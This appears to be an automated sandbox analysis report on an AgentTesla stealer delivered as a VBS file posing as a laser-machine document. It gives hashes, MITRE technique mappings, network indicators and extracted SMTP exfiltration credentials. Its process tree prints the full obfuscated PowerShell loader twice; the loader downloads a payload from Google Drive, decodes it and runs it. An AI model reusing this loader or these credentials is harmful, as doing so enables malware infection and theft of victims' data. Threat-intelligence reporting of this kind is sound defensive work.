agenttesla | 27438e31d5f47cd00c0f95379ba8516a439efb1291386d26742720e4d5dabe39

General

Target

MÁY LASER SOL E&C_FIBER_20240515.vbs
Size

428KB
MD5

63c9e6885ce22fe4f260b7415e8dcd57
SHA1

d469f256e344841ed4fb2cd5f977ebecba23d397
SHA256

27438e31d5f47cd00c0f95379ba8516a439efb1291386d26742720e4d5dabe39
SHA512

12accf888566b98277c095e830cb21d7cc11be582036da57a17437da43e32d9158f399acc5e3cea9679fc0655a3b5ac8d0a8a8e947988b9776c0d965f4a6dfc3
SSDEEP

6144:0y4t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+4K:0VJv0ayfOb64MRycngoavbN0vBrbNt7

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
mail.z2neumec.com
Port:
587
Username:
[email protected]
Password:
Gid@2021

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.z2neumec.com
Port:
587
Username:
[email protected]
Password:
Gid@2021
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	4868	WScript.exe
15	1688	powershell.exe
20	1688	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
15	drive.google.com
46	drive.google.com
14	drive.google.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
52	api.ipify.org
51	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2684	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4060	powershell.exe
2684	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4060 set thread context of 2684	4060	powershell.exe	101

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1688	powershell.exe
1688	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
2684	wab.exe
2684	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4060	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	2684	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 4868 wrote to memory of 1688	4868	WScript.exe	86
PID 4868 wrote to memory of 1688	4868	WScript.exe	86
PID 1688 wrote to memory of 1604	1688	powershell.exe	89
PID 1688 wrote to memory of 1604	1688	powershell.exe	89
PID 1688 wrote to memory of 4060	1688	powershell.exe	97
PID 1688 wrote to memory of 4060	1688	powershell.exe	97
PID 1688 wrote to memory of 4060	1688	powershell.exe	97
PID 4060 wrote to memory of 3540	4060	powershell.exe	99
PID 4060 wrote to memory of 3540	4060	powershell.exe	99
PID 4060 wrote to memory of 3540	4060	powershell.exe	99
PID 4060 wrote to memory of 2684	4060	powershell.exe	101
PID 4060 wrote to memory of 2684	4060	powershell.exe	101
PID 4060 wrote to memory of 2684	4060	powershell.exe	101
PID 4060 wrote to memory of 2684	4060	powershell.exe	101
PID 4060 wrote to memory of 2684	4060	powershell.exe	101

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MÁY LASER SOL E&C_FIBER_20240515.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pairpigernes = 1;$Primfaktorerne='Su';$Primfaktorerne+='bstrin';$Primfaktorerne+='g';Function bikuber($Takometret){$Skinproblemet=$Takometret.Length-$Pairpigernes;For($Analyserammer71=1;$Analyserammer71 -lt $Skinproblemet;$Analyserammer71+=2){$Damoklessvrds199+=$Takometret.$Primfaktorerne.Invoke( $Analyserammer71, $Pairpigernes);}$Damoklessvrds199;}function Gennemsyrendes42($Ingates){. ($Atimon) ($Ingates);}$Tilgifts=bikuber ',M otzCi lTlFae/I5 .,0. I(EWSi nGdDoCw s. PNST, 1 0D..0.;, W iMn 6C4.;C .xP6c4,;S .rfvS: 1Q2G1 .,0 )M EGPeRc.k,o /.2 0,1.0.0 1U0W1A F iEr eVf,oBx /L1,2R1L. 0 ';$Womanishness=bikuber ' U s e rC-EASgPe n.t ';$skilberne=bikuber 'Ih,t.tRp s.:D/ /Sd rEi vHeO.,gHo o g l.e,..c.o.mT/,uEc ?Be.x.p.ocrPtS=LdFoBw n lEo,aMdS&hi,d =,1Px Y fUYTZ.E OV5tTElI9 z EUx,X zMRD_ g 6 LPwcT e.H c ZSJ k Z PBi. ';$Monkishly=bikuber 'C>A ';$Atimon=bikuber 'Oi eCx ';$Daekkede='Recontrolling';Gennemsyrendes42 (bikuber 'TSReItS-FC ounUtSe nRt. ,-UPDa,t h MT.:P\OPTr e iOnrd,uMl.g e . t,x t B- V a.l u e S$.Dga.e,kAk eHd eV; ');Gennemsyrendes42 (bikuber ',iDf T( tBeWs t.-,p.aPtShU T :,\UPKrFeViBnBdUu,l gSe ..t x t,)A{Ue.x iJt }W; ');$Liebhaveri = bikuber 'EeNc,h oF U% a.p p,dPaEtSa %.\SAMfSdGd e,. W o.oA A&D&C eAcbh,o A$ ';Gennemsyrendes42 (bikuber ' $Pg.l.oAbUaTl : MGa.h s e e rE=d(,cUmUdr M/Hc P$TL iAe,b,h a vTe r.iG)a ');Gennemsyrendes42 (bikuber ' $Dg lSoBbSaGl :FBUe s i dad.edl sBe.rkn,e =A$WsDk i,lPbBeCrUn eS.LsSp lMiSt ( $ M,o,n,k iLsPhUlUyN). ');$skilberne=$Besiddelserne[0];Gennemsyrendes42 (bikuber 'D$Tg lho bAa.l.:BAKsSs eesNs,oCrTsR=IN eKw - O,bGjPepc tM WSDyGs t,eEm..,N eFt . W eRbSC lBi e,nRt. ');Gennemsyrendes42 (bikuber ' $LAVs sAe,s,s,oFr sM..H.eSa.d.e r,s [,$AWCo.m aFn i,s,hSnKeSs s ]T=F$ T islCg iDf tBs ');$Ekstraparlamentarisk=bikuber ',AusKs.e s s o.r s,..DToBwWnKl o.a dSFsiSlBes(T$,sKkPi,lSbSe rAn eS,D$.BsaStbtGlDeEfFrMoUnUt s.)T ';$Ekstraparlamentarisk=$Mahseer[1]+$Ekstraparlamentarisk;$Battlefronts=$Mahseer[0];Gennemsyrendes42 (bikuber ' $fgOlHo bNaLlG:SB aas.iHsEb oTg.e nLs,= (ATCe sPtC-LPOa tSh .$VBFa,tNt l ePfTr.o nKt,s.)B ');while (!$Basisbogens) {Gennemsyrendes42 (bikuber 'D$ gBlBoTb a l :,ADr bCeLjVd sPtVa.g.e r eRnA= $MtNrBure ') ;Gennemsyrendes42 $Ekstraparlamentarisk;Gennemsyrendes42 (bikuber ' S.tKa rIt,-hSfl eGe p B4A ');Gennemsyrendes42 (bikuber 'T$Sg.l oGb a l :,B aUs iasSb oog eWn.sS=F(,T.e sAtP-CPbaAtfhO M$CB a t t l,eFf.r o.nPtEs )G ') ;Gennemsyrendes42 (bikuber 'M$Gg,l o,b.a.lS: D,rAaSgVe,fHl yUv.nSiFnSgUe nU=G$Dg lSo bFa lB: DsiAv iVd e nVd e.nU5a8 +.+D%A$ BIeasHiUdSdkeOlRs eBr.nJe .Sc oTuDn.t ') ;$skilberne=$Besiddelserne[$Drageflyvningen];}$Afgiftspolitiske=366875;$Uncholeric80=25858;Gennemsyrendes42 (bikuber ' $.g lHo bNaNl :MDge mTi,pSlSa cFa t eI .=S G eetA-,C.oRnMtHeEn t, L$FB,aRt t,l,e fGrNoSn t sR ');Gennemsyrendes42 (bikuber 'L$RgYlNo bDa,l,:,S,pPoSrBs kAi.f,t eR ,=R ,[ S ySsAtFeAmF.BC.o niv eBr.t ]D: :LFSrboOmTBHaSs.eP6H4ISStPr iAnHg.( $ DSe mTi p.lRaEcFa tSeF) ');Gennemsyrendes42 (bikuber 'O$fg.l.oSbBaSlU:MCSo.l.lNe c,t.iCoAn sR F=P ,[,STy,s t,e.mH. TCe x,tc.UE nEc o,dPi nFgM] :H: A S C IhIM.HG e.tSS tFr.iAnkgV( $VS pCo rPsOk isfFt e ) ');Gennemsyrendes42 (bikuber ' $ g l oHbUajl :FSSuab s i b,i l.a,nCt lPyO=N$MCSoTl.l eXcMtriGoMnTs .Js uMb,sItDr i.nUgS(,$,ASf,g,i.fAtCsGpPoPl,i t iss kUeC, $ UKnEcShOo lse rFi cT8P0.). ');Gennemsyrendes42 $Subsibilantly;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1688
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Afdde.Woo && echo $"
    3⤵
    PID:1604
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Pairpigernes = 1;$Primfaktorerne='Su';$Primfaktorerne+='bstrin';$Primfaktorerne+='g';Function bikuber($Takometret){$Skinproblemet=$Takometret.Length-$Pairpigernes;For($Analyserammer71=1;$Analyserammer71 -lt $Skinproblemet;$Analyserammer71+=2){$Damoklessvrds199+=$Takometret.$Primfaktorerne.Invoke( $Analyserammer71, $Pairpigernes);}$Damoklessvrds199;}function Gennemsyrendes42($Ingates){. ($Atimon) ($Ingates);}$Tilgifts=bikuber ',M otzCi lTlFae/I5 .,0. I(EWSi nGdDoCw s. PNST, 1 0D..0.;, W iMn 6C4.;C .xP6c4,;S .rfvS: 1Q2G1 .,0 )M EGPeRc.k,o /.2 0,1.0.0 1U0W1A F iEr eVf,oBx /L1,2R1L. 0 ';$Womanishness=bikuber ' U s e rC-EASgPe n.t ';$skilberne=bikuber 'Ih,t.tRp s.:D/ /Sd rEi vHeO.,gHo o g l.e,..c.o.mT/,uEc ?Be.x.p.ocrPtS=LdFoBw n lEo,aMdS&hi,d =,1Px Y fUYTZ.E OV5tTElI9 z EUx,X zMRD_ g 6 LPwcT e.H c ZSJ k Z PBi. ';$Monkishly=bikuber 'C>A ';$Atimon=bikuber 'Oi eCx ';$Daekkede='Recontrolling';Gennemsyrendes42 (bikuber 'TSReItS-FC ounUtSe nRt. ,-UPDa,t h MT.:P\OPTr e iOnrd,uMl.g e . t,x t B- V a.l u e S$.Dga.e,kAk eHd eV; ');Gennemsyrendes42 (bikuber ',iDf T( tBeWs t.-,p.aPtShU T :,\UPKrFeViBnBdUu,l gSe ..t x t,)A{Ue.x iJt }W; ');$Liebhaveri = bikuber 'EeNc,h oF U% a.p p,dPaEtSa %.\SAMfSdGd e,. W o.oA A&D&C eAcbh,o A$ ';Gennemsyrendes42 (bikuber ' $Pg.l.oAbUaTl : MGa.h s e e rE=d(,cUmUdr M/Hc P$TL iAe,b,h a vTe r.iG)a ');Gennemsyrendes42 (bikuber ' $Dg lSoBbSaGl :FBUe s i dad.edl sBe.rkn,e =A$WsDk i,lPbBeCrUn eS.LsSp lMiSt ( $ M,o,n,k iLsPhUlUyN). ');$skilberne=$Besiddelserne[0];Gennemsyrendes42 (bikuber 'D$Tg lho bAa.l.:BAKsSs eesNs,oCrTsR=IN eKw - O,bGjPepc tM WSDyGs t,eEm..,N eFt . W eRbSC lBi e,nRt. ');Gennemsyrendes42 (bikuber ' $LAVs sAe,s,s,oFr sM..H.eSa.d.e r,s [,$AWCo.m aFn i,s,hSnKeSs s ]T=F$ T islCg iDf tBs ');$Ekstraparlamentarisk=bikuber ',AusKs.e s s o.r s,..DToBwWnKl o.a dSFsiSlBes(T$,sKkPi,lSbSe rAn eS,D$.BsaStbtGlDeEfFrMoUnUt s.)T ';$Ekstraparlamentarisk=$Mahseer[1]+$Ekstraparlamentarisk;$Battlefronts=$Mahseer[0];Gennemsyrendes42 (bikuber ' $fgOlHo bNaLlG:SB aas.iHsEb oTg.e nLs,= (ATCe sPtC-LPOa tSh .$VBFa,tNt l ePfTr.o nKt,s.)B ');while (!$Basisbogens) {Gennemsyrendes42 (bikuber 'D$ gBlBoTb a l :,ADr bCeLjVd sPtVa.g.e r eRnA= $MtNrBure ') ;Gennemsyrendes42 $Ekstraparlamentarisk;Gennemsyrendes42 (bikuber ' S.tKa rIt,-hSfl eGe p B4A ');Gennemsyrendes42 (bikuber 'T$Sg.l oGb a l :,B aUs iasSb oog eWn.sS=F(,T.e sAtP-CPbaAtfhO M$CB a t t l,eFf.r o.nPtEs )G ') ;Gennemsyrendes42 (bikuber 'M$Gg,l o,b.a.lS: D,rAaSgVe,fHl yUv.nSiFnSgUe nU=G$Dg lSo bFa lB: DsiAv iVd e nVd e.nU5a8 +.+D%A$ BIeasHiUdSdkeOlRs eBr.nJe .Sc oTuDn.t ') ;$skilberne=$Besiddelserne[$Drageflyvningen];}$Afgiftspolitiske=366875;$Uncholeric80=25858;Gennemsyrendes42 (bikuber ' $.g lHo bNaNl :MDge mTi,pSlSa cFa t eI .=S G eetA-,C.oRnMtHeEn t, L$FB,aRt t,l,e fGrNoSn t sR ');Gennemsyrendes42 (bikuber 'L$RgYlNo bDa,l,:,S,pPoSrBs kAi.f,t eR ,=R ,[ S ySsAtFeAmF.BC.o niv eBr.t ]D: :LFSrboOmTBHaSs.eP6H4ISStPr iAnHg.( $ DSe mTi p.lRaEcFa tSeF) ');Gennemsyrendes42 (bikuber 'O$fg.l.oSbBaSlU:MCSo.l.lNe c,t.iCoAn sR F=P ,[,STy,s t,e.mH. TCe x,tc.UE nEc o,dPi nFgM] :H: A S C IhIM.HG e.tSS tFr.iAnkgV( $VS pCo rPsOk isfFt e ) ');Gennemsyrendes42 (bikuber ' $ g l oHbUajl :FSSuab s i b,i l.a,nCt lPyO=N$MCSoTl.l eXcMtriGoMnTs .Js uMb,sItDr i.nUgS(,$,ASf,g,i.fAtCsGpPoPl,i t iss kUeC, $ UKnEcShOo lse rFi cT8P0.). ');Gennemsyrendes42 $Subsibilantly;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Afdde.Woo && echo $"
      4⤵
      PID:3540
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2684

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qg1c4qs0.xi2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Afdde.Woo

Filesize
511KB

MD5
ac1f4a575a29efd580486f8b4da7d4ce

SHA1
e01480adb3540c6efab5e6811a284eaecb3a80b9

SHA256
534464c375431a2ba1e85c9dbbd6662a97048f1381f96384e5ca65d57b3a5e4d

SHA512
2f020e4d95aab7e27c3415c3fe9ee79f9a1ec987574268791c1788d9a7fe7379b00be22232e33c6a7d23f5467098b48113af549fcf9246ec46c23b2fe4bd96c9

Download Submit
memory/1688-63-0x00007FFFB9500000-0x00007FFFB9FC1000-memory.dmp

Filesize
10.8MB

Download
memory/1688-14-0x000002ACA27B0000-0x000002ACA27D2000-memory.dmp

Filesize
136KB

Download
memory/1688-15-0x00007FFFB9500000-0x00007FFFB9FC1000-memory.dmp

Filesize
10.8MB

Download
memory/1688-16-0x00007FFFB9500000-0x00007FFFB9FC1000-memory.dmp

Filesize
10.8MB

Download
memory/1688-17-0x00007FFFB9500000-0x00007FFFB9FC1000-memory.dmp

Filesize
10.8MB

Download
memory/1688-44-0x00007FFFB9503000-0x00007FFFB9505000-memory.dmp

Filesize
8KB

Download
memory/1688-4-0x00007FFFB9503000-0x00007FFFB9505000-memory.dmp

Filesize
8KB

Download
memory/1688-45-0x00007FFFB9500000-0x00007FFFB9FC1000-memory.dmp

Filesize
10.8MB

Download
memory/2684-67-0x0000000022A80000-0x0000000022B12000-memory.dmp

Filesize
584KB

Download
memory/2684-65-0x00000000228F0000-0x0000000022940000-memory.dmp

Filesize
320KB

Download
memory/2684-60-0x0000000000F20000-0x0000000000F62000-memory.dmp

Filesize
264KB

Download
memory/2684-59-0x0000000000F20000-0x0000000002174000-memory.dmp

Filesize
18.3MB

Download
memory/2684-66-0x00000000229E0000-0x0000000022A7C000-memory.dmp

Filesize
624KB

Download
memory/2684-68-0x0000000022980000-0x000000002298A000-memory.dmp

Filesize
40KB

Download
memory/4060-21-0x00000000050B0000-0x00000000056D8000-memory.dmp

Filesize
6.2MB

Download
memory/4060-40-0x0000000007150000-0x0000000007172000-memory.dmp

Filesize
136KB

Download
memory/4060-41-0x0000000008350000-0x00000000088F4000-memory.dmp

Filesize
5.6MB

Download
memory/4060-39-0x0000000007240000-0x00000000072D6000-memory.dmp

Filesize
600KB

Download
memory/4060-43-0x0000000008900000-0x000000000A769000-memory.dmp

Filesize
30.4MB

Download
memory/4060-38-0x00000000070E0000-0x00000000070FA000-memory.dmp

Filesize
104KB

Download
memory/4060-37-0x0000000007720000-0x0000000007D9A000-memory.dmp

Filesize
6.5MB

Download
memory/4060-36-0x0000000005FD0000-0x000000000601C000-memory.dmp

Filesize
304KB

Download
memory/4060-35-0x0000000005F90000-0x0000000005FAE000-memory.dmp

Filesize
120KB

Download
memory/4060-34-0x0000000005AA0000-0x0000000005DF4000-memory.dmp

Filesize
3.3MB

Download
memory/4060-24-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/4060-23-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/4060-22-0x0000000005720000-0x0000000005742000-memory.dmp

Filesize
136KB

Download
memory/4060-20-0x00000000049E0000-0x0000000004A16000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads